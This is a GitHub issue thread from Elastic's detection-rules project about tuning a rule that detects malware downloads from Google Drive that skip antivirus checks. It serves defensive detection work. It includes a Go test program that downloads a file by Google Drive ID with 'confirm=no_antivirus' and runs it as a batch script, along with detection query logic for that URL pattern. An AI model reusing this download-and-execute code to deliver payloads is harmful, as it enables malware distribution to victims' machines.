search

elastic / detection-rules

https://www.elastic.co/guide/en/security/current/detection-engine-overview.html
Other
1.97k stars 502 forks source link

[Rule Tuning] Google Drive Direct Download Detection #3391

Closed terrancedejesus closed 6 months ago

terrancedejesus commented 10 months ago

Link to rule

https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml

Description

This rule has some performance and false-positive considerations that should be addressed. The maxspan is small, however the use of wildcards and OR logic may be too broad and cause performance issues when the first sequence query is collecting events.

### Tasks
- [ ] https://github.com/elastic/detection-rules/pull/3411
- [ ] Create a new rule, primarily identifying HTTP requests (so we can have logic on the URI parameters) to that URL
- [ ] Start some digging into new terms for process executable and dns domain combinations to web services and chat platforms (telegram, discord, etc.)
terrancedejesus commented 10 months ago

Related requests to tune this rule:

terrancedejesus commented 9 months ago

Update 01-23-2024

After some initial triage, it appears that direct download links to Google Drive with parameter confirm=no_antivirus may no longer be viable. Although this is submitted, response code 303 is given and redirection to a manual download page is given. Before, it would download the malware directly without the redirection.

While this is the case, the threat of leveraging Google Drive for malware distribution is still prevalent, however, further research and emulation will need to be conducted to properly tune this rule.

Regarding performance, the rule can also be adjusted - specifically with the initial sequence and wildcard usage. Since we have no visibility into the URL requested during the TLS connection, we are unable to write logic on URL parameters. As a result, we must rely on a collection of events with DNS traffic, process and file based events.

Go code to download directly from Google Drive and execute batch script- used for testing: ``` "io" "net/http" "os" "os/exec" ) func main() { // Define a command-line flag fileID := flag.String("id", "", "Google Drive file ID") flag.Parse() // Check if the file ID is provided if *fileID == "" { fmt.Println("Please provide a Google Drive file ID using -id flag.") os.Exit(1) } filename := "downloaded_script.bat" fileURL := fmt.Sprintf("https://drive.google.com/uc?export=download&id=%s&confirm=no_antivirus", *fileID) err := downloadFile(filename, fileURL) if err != nil { panic(err) } fmt.Println("File downloaded successfully") // Execute the file err = executeBatchFile(filename) if err != nil { panic(err) } fmt.Println("Batch file executed successfully") } // downloadFile will download a url to a local file. func downloadFile(filepath string, url string) error { // Get the data resp, err := http.Get(url) if err != nil { return err } defer resp.Body.Close() // Create the file out, err := os.Create(filepath) if err != nil { return err } defer out.Close() // Write the body to file _, err = io.Copy(out, resp.Body) return err } // executeBatchFile executes a .bat file. func executeBatchFile(filepath string) error { cmd := exec.Command("cmd", "/C", filepath) cmd.Stdout = os.Stdout cmd.Stderr = os.Stderr return cmd.Run() } ```
rheimsothdecoit commented 9 months ago

Be aware that this OR after the first block makes nearly always the following parts useless, e.g. in our environment event.action is always "load".

Please check if instead of the "or" "and" would be correct.

/* Look for processes started or libraries loaded from untrusted or unsigned Windows, Linux or macOS binaries */
(event.action in ("exec", "fork", "start", "load")) or

/* Look for Google Drive download URL with AV flag skipping */
(process.args : "*drive.google.com*" and process.args : "*export=download*" and process.args : "*confirm=no_antivirus*")

...

Also the benign process list does not contain firefox and chrome binaries on linux machines, only the windows parts.

...
 and not process.executable:
        ("/bin/terraform",
        "*/bin/dockerd",
        "/usr/local/bin/docker-init",
        "*/bin/go",
        "?:\\Program Files*\\Mozilla Firefox\firefox.exe",
        "?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe")
...
terrancedejesus commented 9 months ago

Update 02-01-2024

After some research and discussion, we have expanded the scope of this rule tuning issue. We will be decoupling some of the activity attempted to be identified with the original rule, as well as creating new rules to detect similar activity.

Details can be found in the tuning pull request: https://github.com/elastic/detection-rules/pull/3411#issuecomment-1917681233

A tasklist has been added at the top of this tuning to add additional scope.

botelastic[bot] commented 7 months ago

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

terrancedejesus commented 6 months ago

Closing this issue. Original tuning has been completed. Further investigation revealed that HTTPS and TLS are used for making connections to Google Drive by default and thus we do not have proper visibility via existing integrations.